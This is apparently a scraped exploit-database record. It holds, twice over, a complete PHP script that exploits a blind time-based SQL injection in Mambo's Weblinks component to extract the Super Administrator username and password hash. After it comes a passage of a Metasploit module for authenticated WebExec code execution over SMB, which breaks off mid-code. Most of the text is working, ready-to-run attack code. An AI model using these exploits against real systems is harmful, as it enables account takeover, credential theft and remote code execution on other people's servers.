{"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:28:14", "bulletin": {"published": "2006-06-17T00:00:00", "id": "1337DAY-ID-522", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:28:14"}}, "hash": "e8dd10441cbe8c60046fbaf71a4ad2ea43d675f5054a167478f36447de7d8d69", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:28:14", "edition": 1, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "http://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod rgod@autistici.org\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data =\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n $endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7aa2323a8c05510e36ec423b400eed59", "key": "sourceHref"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e1c13c78b94a1904a3ac51d669e0dd98", "key": "href"}, {"hash": "fb733324659391a715e8ec8f6ebcccc4", "key": "sourceData"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "8db12d6b291e94cc0663084da9d334bb5f84e6a35d822aeb517931a52898b5a2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "lenovo", "idList": ["LENOVO:PS500155-NOSID"]}, {"type": "dsquare", "idList": ["E-631"]}, {"type": "zdt", "idList": ["1337DAY-ID-29989", "1337DAY-ID-29759", "1337DAY-ID-29438", "1337DAY-ID-27679", "1337DAY-ID-26247"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310890871", "OPENVAS:1361412562310809216"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_4025341.NASL", "EULEROS_SA-2016-1036.NASL", "DEBIAN_DLA-871.NASL", "GENTOO_GLSA-201701-18.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-871-1:C4200"]}, {"type": "kitploit", "idList": ["KITPLOIT:6230906110179095668"]}, {"type": "n0where", "idList": ["N0WHERE:159714"]}, {"type": "gentoo", "idList": ["GLSA-201701-18"]}, {"type": "f5", "idList": ["F5:K01955184"]}, {"type": "korelogic", "idList": ["KL-001-2016-008"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/IKE/CISCO_IKE_BENIGNCERTAIN"]}], "modified": "2018-03-01T23:43:11"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-01T23:43:11", "edition": 2, "title": "Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/522", "modified": "2006-06-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 14, "cvelist": [], "sourceHref": "https://0day.today/exploit/522", "references": [], "reporter": "rgod", "sourceData": "======================================================\r\nMambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\\r\\n\";\r\necho \"disclosure exploit (benchmark() vesion)\\r\\n\";\r\necho \"by rgod [email\u00a0protected]\\r\\n\";\r\necho \"site: http://retrogod.altervista.org\\r\\n\";\r\necho \"this is called the Sun-Tzu 'trascendental guru meditation' tecnique\\r\\n\\r\\n\";\r\n\r\nif ($argc<5) {\r\necho \"Usage: php \".$argv[0].\" host path user pass OPTIONS\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to Mambo\\r\\n\";\r\necho \"user/pass: you need an account\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -T[prefix] specify a table prefix different from 'mos_'\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /mambo/ username password\\r\\n\";\r\ndie;\r\n}\r\n\r\n/*\r\n explaination:\r\n\r\n sql injection in \"title\" argument when you submit a web link, poc:\r\n start mysql daemon with log option...\r\n\r\n >mysqld --log=mambo.txt\r\n\r\n now login, go to \"Submit Weblink\" feature, in \"Name: \" field type:\r\n\r\n 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*\r\n\r\n in mambo.txt we have:\r\n\r\n 13 Query SELECT id FROM mos_weblinks\r\n WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'\r\n\r\n injection is blind but, as you can see, we can you use time delays through Mysql\r\n benchmark() function to ask questions about tables\r\n\r\n this works regardless of magic_quotes_gpc settings\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data =\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n $endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d0da9c5cf87ed68134d789b648fdc1b8", "key": "href"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "000977933f613211c59d6cc18b78170a", "key": "sourceData"}, {"hash": "cce4daee587c29bc064bbf6d2a882370", "key": "sourceHref"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-04-14T09:49:50", "bulletinFamily": "exploit", "description": "This module uses a valid username and password of any level (or password hash) to execute an arbitrary payload. This module is similar to the \"psexec\" module, except allows any non-guest account by default.", "modified": "2018-10-24T14:46:00", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/SMB/WEBEXEC", "href": "", "type": "metasploit", "title": "WebExec Authenticated User Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::SMB::Client::WebExec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebExec Authenticated User Code Execution',\n 'Description' => %q{\n This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.\n },\n 'Author' =>\n [\n 'Ron <ron@skullsecurity.net>',\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n [ 'CVE', '2018-15442' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Native upload', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 24 2018'\n ))\n\n register_options(\n [\n # This has to be a full path, %ENV% variables are not expanded\n OptString.new('TMPDIR', [ true, \"The directory to stage our payload in\", \"c:\\\\Windows\\\\Temp\\\\\" ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptInt.new('MAX_LINE_LENGTH', [true, \"The length of lines when splitting up the payload\", 1000]),\n ])\n end\n\n # This is the callback for cmdstager, which breaks the full command into\n # chunks and sends it our way. We have to do a bit of finangling to make it\n # work correctly\n def execute_command(command, opts)\n # Replace the empty string, \"\", with a workaround - the first 0 characters of \"A\"\n command = command.gsub('\"\"', 'mid(Chr(65), 1, 0)')\n\n # Replace quoted strings with Chr(XX) versions, in a naive way\n command = command.gsub(/\"[^\"]*\"/) do |capture|\n capture.gsub(/\"/, \"\").chars.map do |c|\n \"Chr(#{c.ord})\"\n end.join('+')\n end\n\n # Prepend \"cmd /c\" so we can use a redirect\n command = \"cmd /c \" + command\n\n execute_single_command(command, opts)\n end\n\n def exploit\n print_status(\"Connecting to the server...\")\n connect(versions: [2,1])\n\n print_status(\"Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...\")\n smb_login\n\n if not simple.client.auth_user and not datastore['ALLOW_GUEST']\n print_line(\" \")\n print_error(\n \"FAILED! The remote host has only provided us with Guest privileges. \" +\n \"Please make sure that the correct username and password have been provided. \" +\n \"Windows XP systems that are not part of a domain will only provide Guest privileges \" +\n \"to network logins by default.\"\n )\n print_line(\" \")\n disconnect\n return\n end\n\n begin\n if datastore['SMBUser'].to_s.strip.length > 0\n report_auth\n end\n\n # Avoid implementing NTLMSSP on Windows XP\n # http://seclists.org/metasploit/2009/q1/6\n if smb_peer_os == \"Windows 5.1\"\n 